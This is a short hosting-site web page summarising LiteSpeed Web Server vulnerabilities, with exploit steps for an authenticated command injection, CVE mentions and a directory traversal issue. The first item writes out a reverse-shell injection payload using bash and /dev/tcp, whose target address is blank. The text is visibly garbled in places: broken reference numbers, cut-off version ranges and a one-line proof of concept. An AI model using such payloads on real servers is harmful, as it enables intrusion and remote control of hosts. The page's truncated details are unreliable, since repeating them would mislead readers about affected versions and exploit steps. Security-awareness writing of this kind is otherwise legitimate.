Get Web Hosting Solutions

LiteSpeed Web Server exploit


Let’s delve into the topic of LiteSpeed Web Server (LSWS) exploits. While LSWS is known for its performance and security features, like any software, it can have vulnerabilities. Here are some notable instances:

  1. Command Injection (Authenticated):
    • Vulnerability: In LSWS Enterprise version 5.4.11, an authenticated attacker could exploit a command injection vulnerability.
    • Exploit Steps:
      1. Log in to the dashboard using the Administrator account.
      2. Access Server Configuration > Server > External App > Edit.
      3. Set “Start By Server *” Value to “Yes (Through CGI Daemon)”.
      4. Inject the payload fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' into the “Command” value.
      5. Perform a graceful restart.
    • Proof of Concept (PoC):
      POST /config/confMgr.php HTTP/1.1
    • References: 12
  2. CVE-2022-0072, CVE-2022-0073, and CVE-2022-0074:
    • Vulnerability: These vulnerabilities affect OpenLiteSpeed and LiteSpeed Enterprise WebAdmin Console.
    • Exploit Scenario: After achieving WebAdmin Authentication, an attacker could create a secret backdoor and exploit the vulnerability to access it.
    • Mitigation: Ensure timely updates and patches.
    • Reference: 3
  3. Directory Traversal Vulnerability:
    • Vulnerability: In certain versions of LSWS, a directory traversal vulnerability exists in the OpenLiteSpeed Web Server Dashboard.
    • Impact: An attacker could exploit path traversal.
    • Affected Versions: Versions from 1.5.11 through 1.5.12, 1.6.5 through, and 1.7.0 before
    • Reference: 4

Remember that staying informed about security updates and promptly applying patches is crucial to safeguarding your web server. LSWS remains a powerful choice, but vigilance is essential to mitigate risks.


Using this platform to discover, share and learn.